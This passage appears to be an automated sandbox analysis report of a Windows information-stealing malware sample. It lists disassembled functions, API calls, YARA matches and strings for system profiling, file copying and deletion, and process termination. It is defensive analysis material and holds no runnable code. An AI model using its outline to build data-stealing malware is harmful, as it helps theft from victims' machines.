                                                                                                                                                                                                              • Part of subcall function 00410B10: CharToOemA.USER32(00000000,?), ref: 00410B92
                                                                                                                                                                                                              • Part of subcall function 00410BB0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410BC5
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C48
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetVolumeInformationA.KERNEL32(004218D9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C81
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410CCD
                                                                                                                                                                                                              • Part of subcall function 00410C10: HeapAlloc.KERNEL32(00000000), ref: 00410CD4
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00427218,00000000,?,00000000,00000000,00000000,00000000), ref: 0041586B
                                                                                                                                                                                                              • Part of subcall function 004118A0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004118BC
                                                                                                                                                                                                              • Part of subcall function 004118A0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004118D7
                                                                                                                                                                                                              • Part of subcall function 004118A0: CloseHandle.KERNEL32(00000000), ref: 004118DE
                                                                                                                                                                                                              • Part of subcall function 00410DC0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DD5
                                                                                                                                                                                                              • Part of subcall function 00410DC0: HeapAlloc.KERNEL32(00000000), ref: 00410DDC
                                                                                                                                                                                                              • Part of subcall function 00410F00: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042723C,00000000,?,Work Dir: In memory,00000000,?,00427224,00000000), ref: 00410F23
                                                                                                                                                                                                              • Part of subcall function 00410F00: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042723C), ref: 00410F34
                                                                                                                                                                                                              • Part of subcall function 00410F00: CoCreateInstance.OLE32(00427B4C,00000000,00000001,00427A7C,?,?,00000000,?,Windows: ,00000000,?,0042723C,00000000,?,Work Dir: In memory,00000000), ref: 00410F4E
                                                                                                                                                                                                              • Part of subcall function 00410F00: CoSetProxyBlanket.OLE32($rB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042723C,00000000), ref: 00410F87
                                                                                                                                                                                                              • Part of subcall function 00410F00: VariantInit.OLEAUT32(?), ref: 00410FE6
                                                                                                                                                                                                              • Part of subcall function 004110C0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260,00000000,?,00000000,00000000), ref: 004110E3
                                                                                                                                                                                                              • Part of subcall function 004110C0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260), ref: 004110F4
                                                                                                                                                                                                              • Part of subcall function 004110C0: CoCreateInstance.OLE32(00427B4C,00000000,00000001,00427A7C,?,?,00000000,?,AV: ,00000000,?,00427260,00000000,?,00000000,00000000), ref: 0041110E
                                                                                                                                                                                                              • Part of subcall function 004110C0: CoSetProxyBlanket.OLE32(`rB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260,00000000), ref: 00411147
                                                                                                                                                                                                              • Part of subcall function 004110C0: VariantInit.OLEAUT32(?), ref: 004111A2
                                                                                                                                                                                                              • Part of subcall function 00410140: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00415AFE,00000000,?,Computer Name: ,00000000,?,0042726C,00000000,?,00000000,00000000), ref: 0041014C
                                                                                                                                                                                                              • Part of subcall function 00410140: HeapAlloc.KERNEL32(00000000,?,?,?,00415AFE,00000000,?,Computer Name: ,00000000,?,0042726C,00000000,?,00000000,00000000,00000000), ref: 00410153
                                                                                                                                                                                                              • Part of subcall function 00410140: GetComputerNameA.KERNEL32(00000000,00000000), ref: 00410167
                                                                                                                                                                                                              • Part of subcall function 00410100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00418382,004271D3), ref: 0041010C
                                                                                                                                                                                                              • Part of subcall function 00410100: HeapAlloc.KERNEL32(00000000,?,?,?,00418382,004271D3), ref: 00410113
                                                                                                                                                                                                              • Part of subcall function 00410100: GetUserNameA.ADVAPI32(00000000,004271D3), ref: 00410127
                                                                                                                                                                                                              • Part of subcall function 00410A90: CreateDCA.GDI32(00CB2EC0,00000000,00000000,00000000), ref: 00410AAA
                                                                                                                                                                                                              • Part of subcall function 00410A90: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410AB5
                                                                                                                                                                                                              • Part of subcall function 00410A90: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410AC0
                                                                                                                                                                                                              • Part of subcall function 00410A90: ReleaseDC.USER32(00000000,00000000), ref: 00410ACB
                                                                                                                                                                                                              • Part of subcall function 00410A90: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415BFA,?,00000000,?,Display Resolution: ,00000000,?,00427290,00000000), ref: 00410AD8
                                                                                                                                                                                                              • Part of subcall function 00410A90: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415BFA,?,00000000,?,Display Resolution: ,00000000,?,00427290,00000000,?), ref: 00410ADF
                                                                                                                                                                                                              • Part of subcall function 00410A90: wsprintfA.USER32 ref: 00410AEF
                                                                                                                                                                                                              • Part of subcall function 00410250: GetKeyboardLayoutList.USER32(00000000,00000000,00426ED7,?,?,00000001), ref: 00410297
                                                                                                                                                                                                              • Part of subcall function 00410250: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004102A9
                                                                                                                                                                                                              • Part of subcall function 00410250: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004102B4
                                                                                                                                                                                                              • Part of subcall function 00410250: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102E6
                                                                                                                                                                                                              • Part of subcall function 00410250: LocalFree.KERNEL32(?,?,?,00000001), ref: 0041038A
                                                                                                                                                                                                              • Part of subcall function 004101E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004101F1
                                                                                                                                                                                                              • Part of subcall function 004101E0: HeapAlloc.KERNEL32(00000000), ref: 004101F8
                                                                                                                                                                                                              • Part of subcall function 004101E0: GetTimeZoneInformation.KERNEL32(?), ref: 00410207
                                                                                                                                                                                                              • Part of subcall function 004101E0: wsprintfA.USER32 ref: 00410232
                                                                                                                                                                                                              • Part of subcall function 004103B0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004103C5
                                                                                                                                                                                                              • Part of subcall function 004103B0: HeapAlloc.KERNEL32(00000000), ref: 004103CC
                                                                                                                                                                                                              • Part of subcall function 004103B0: RegOpenKeyExA.KERNEL32(80000002,00CBB3A0,00000000,00020119,00000000), ref: 004103EB
                                                                                                                                                                                                              • Part of subcall function 004103B0: RegQueryValueExA.KERNEL32(00000000,00CC1910,00000000,00000000,00000000,000000FF), ref: 00410406
                                                                                                                                                                                                              • Part of subcall function 00410460: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410482
                                                                                                                                                                                                              • Part of subcall function 00410460: GetLastError.KERNEL32(?,?,00000001), ref: 00410490
                                                                                                                                                                                                              • Part of subcall function 00410460: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004104C8
                                                                                                                                                                                                              • Part of subcall function 00410460: wsprintfA.USER32 ref: 00410512
                                                                                                                                                                                                              • Part of subcall function 00410420: GetSystemInfo.KERNEL32(00000000), ref: 0041042D
                                                                                                                                                                                                              • Part of subcall function 00410420: wsprintfA.USER32 ref: 00410443
                                                                                                                                                                                                              • Part of subcall function 00410560: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004272DC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272C8), ref: 0041056E
                                                                                                                                                                                                              • Part of subcall function 00410560: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004272DC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272C8,00000000), ref: 00410575
                                                                                                                                                                                                              • Part of subcall function 00410560: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410595
                                                                                                                                                                                                              • Part of subcall function 00410560: wsprintfA.USER32 ref: 004105BB
                                                                                                                                                                                                              • Part of subcall function 004105D0: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410627
                                                                                                                                                                                                              • Part of subcall function 004105D0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 004106B4
                                                                                                                                                                                                              • Part of subcall function 00410980: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004109CF
                                                                                                                                                                                                              • Part of subcall function 00410980: Process32First.KERNEL32(00000000,00000128), ref: 004109DF
                                                                                                                                                                                                              • Part of subcall function 00410980: Process32Next.KERNEL32(00000000,00000128), ref: 004109F1
                                                                                                                                                                                                              • Part of subcall function 00410980: Process32Next.KERNEL32(00000000,00000128), ref: 00410A5E
                                                                                                                                                                                                              • Part of subcall function 00410980: CloseHandle.KERNEL32(00000000), ref: 00410A69
                                                                                                                                                                                                              • Part of subcall function 004106E0: RegOpenKeyExA.KERNEL32(00000000,00CB65D8,00000000,00020019,00000000,00426EEF,?,00000001), ref: 0041073F
                                                                                                                                                                                                              • Part of subcall function 004106E0: RegEnumKeyExA.KERNEL32(00000000,?,?,TsB,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041079E
                                                                                                                                                                                                              • Part of subcall function 004106E0: wsprintfA.USER32 ref: 004107C7
                                                                                                                                                                                                              • Part of subcall function 004106E0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 004107E5
                                                                                                                                                                                                              • Part of subcall function 004106E0: RegQueryValueExA.KERNEL32(?,00CC1C30,00000000,000F003F,?,00000400), ref: 00410815
                                                                                                                                                                                                              • Part of subcall function 004106E0: lstrlenA.KERNEL32(?), ref: 0041082A
                                                                                                                                                                                                              • Part of subcall function 004106E0: RegQueryValueExA.KERNEL32(?,00CC1B58,00000000,000F003F,?,00000400,00000000,00421861,?,00000000,?,00426F20), ref: 004108AE
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00427364,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004162D7
                                                                                                                                                                                                              • Part of subcall function 004152B0: Sleep.KERNEL32(000003E8,00422461, cA,?,?,?,00000001), ref: 00415375
                                                                                                                                                                                                              • Part of subcall function 004152B0: CreateThread.KERNEL32(00000000,00000000,00413CE0,?,00000000,00000000), ref: 00415396
                                                                                                                                                                                                              • Part of subcall function 004152B0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004153A2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCloseCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                            • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph (function at 414200; graph not reproduced in this text)
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrlenA.KERNEL32(00418439,?,00000000,?,00417B7D,004271CF,004271CE,00000000,?,00000000,00422B88,000000FF,?,00418439), ref: 0040FD9B
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrcpy.KERNEL32(00000000,00418439), ref: 0040FDD2
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414508
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00413910: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413985
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041459D
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004146DB
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414770
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004148BA
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041495C
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414A9A
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414B2F
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414C79
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414D0E
                                                                                                                                                                                                            • Sleep.KERNEL32(0000EA60), ref: 00414D1D
                                                                                                                                                                                                              • Part of subcall function 00413A50: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413AE4
                                                                                                                                                                                                              • Part of subcall function 00413A50: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00421EC9), ref: 00413AFB
                                                                                                                                                                                                              • Part of subcall function 00413A50: StrStrA.SHLWAPI(00000000,00000000), ref: 00413B27
                                                                                                                                                                                                              • Part of subcall function 00413A50: lstrlenA.KERNEL32(00000000), ref: 00413B3C
                                                                                                                                                                                                              • Part of subcall function 00413A50: lstrlenA.KERNEL32(00000000), ref: 00413B59
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                            • String ID: -$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$m|A$m|A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00427460,?,?,?,?,?,?,?,00416992,?), ref: 0041642C
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00427464,?,?,?,?,?,?,?,00416992,?), ref: 00416446
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0041646B
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0042718B,?,?,?,?,?,?,?,?,?,?,?,00416992,?), ref: 0041647D
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004164A5
                                                                                                                                                                                                              • Part of subcall function 004117B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 004117DF
                                                                                                                                                                                                              • Part of subcall function 004117B0: CloseHandle.KERNEL32(00000000), ref: 004117EA
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004164C7
                                                                                                                                                                                                            • memset.MSVCRT ref: 004164DD
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 004164F0
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00416506
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00416533
                                                                                                                                                                                                            • memset.MSVCRT ref: 0041654C
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 0041655C
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00416572
                                                                                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041658A
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004165CD
                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041661B
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0041662E
                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,00416992,?), ref: 00416742
                                                                                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,?,?,?,00416992,?), ref: 00416754
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strtok_swsprintf$CloseFileFindlstrcatmemset$HandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\%s\%s
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FF70: StrCmpCA.SHLWAPI(?,00000000,?,00407356,00CBF110,?,00000000,?), ref: 0040FF7A
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrlenA.KERNEL32(00418439,?,00000000,?,00417B7D,004271CF,004271CE,00000000,?,00000000,00422B88,000000FF,?,00418439), ref: 0040FD9B
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrcpy.KERNEL32(00000000,00418439), ref: 0040FDD2
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 00411330: GetSystemTime.KERNEL32(?,00CBE790,004270B8,?,00000000,00000008,?,?,00000000,00421951,000000FF,?,0040452E,0041FC79,00000014), ref: 00411385
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 004073FF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004076B6
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407805
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268E0), ref: 00407814
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407827
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268E4), ref: 00407836
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407849
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268E8), ref: 00407858
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040786B
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268EC), ref: 0040787A
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040788D
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268F0), ref: 0040789C
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 004078AF
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268F4), ref: 004078BE
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407905
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,004268F8), ref: 00407923
                                                                                                                                                                                                            • lstrlenA.KERNEL32(000000FF), ref: 0040798A
                                                                                                                                                                                                            • lstrlenA.KERNEL32(000000FF), ref: 00407999
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 004076BD
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00411900: memset.MSVCRT ref: 00411935
                                                                                                                                                                                                              • Part of subcall function 00411900: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407426,0040D964), ref: 00411966
                                                                                                                                                                                                              • Part of subcall function 00411900: HeapAlloc.KERNEL32(00000000,?,00407426,0040D964), ref: 0041196D
                                                                                                                                                                                                              • Part of subcall function 00411900: wsprintfW.USER32 ref: 0041197C
                                                                                                                                                                                                              • Part of subcall function 00411900: OpenProcess.KERNEL32(00001001,00000000), ref: 004119DD
                                                                                                                                                                                                              • Part of subcall function 00411900: TerminateProcess.KERNEL32(00000000,00000000), ref: 004119EC
                                                                                                                                                                                                              • Part of subcall function 00411900: CloseHandle.KERNEL32(00000000), ref: 004119F3
                                                                                                                                                                                                            • memset.MSVCRT ref: 004079F0
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,?,?,?,004268AA), ref: 00407A18
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$HeapProcesslstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2944411387-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 00411330: GetSystemTime.KERNEL32(?,00CBE790,004270B8,?,00000000,00000008,?,?,00000000,00421951,000000FF,?,0040452E,0041FC79,00000014), ref: 00411385
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,004268E7,00000009), ref: 004096D6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409842
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00409849
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040998F
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AC0), ref: 0040999E
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 004099B1
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AC4), ref: 004099C0
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 004099D3
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AC8), ref: 004099E2
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 004099F5
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426ACC), ref: 00409A04
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A17
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AD0), ref: 00409A26
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A39
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AD4), ref: 00409A48
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A5B
                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AD8), ref: 00409A6A
                                                                                                                                                                                                            • lstrlenA.KERNEL32(000000FF), ref: 00409AE0
                                                                                                                                                                                                            • lstrlenA.KERNEL32(000000FF), ref: 00409AEF
                                                                                                                                                                                                            • memset.MSVCRT ref: 00409B45
                                                                                                                                                                                                              • Part of subcall function 0040FF70: StrCmpCA.SHLWAPI(?,00000000,?,00407356,00CBF110,?,00000000,?), ref: 0040FF7A
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00409B6D
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1973479514-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00412266
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004122F3
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00412330
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00412379
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004123C2
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 0041240A
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412595
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00412622
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$strtok_s
                                                                                                                                                                                                            • String ID: false$true
                                                                                                                                                                                                            • API String ID: 2610293679-2658103896
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                              • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                              • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
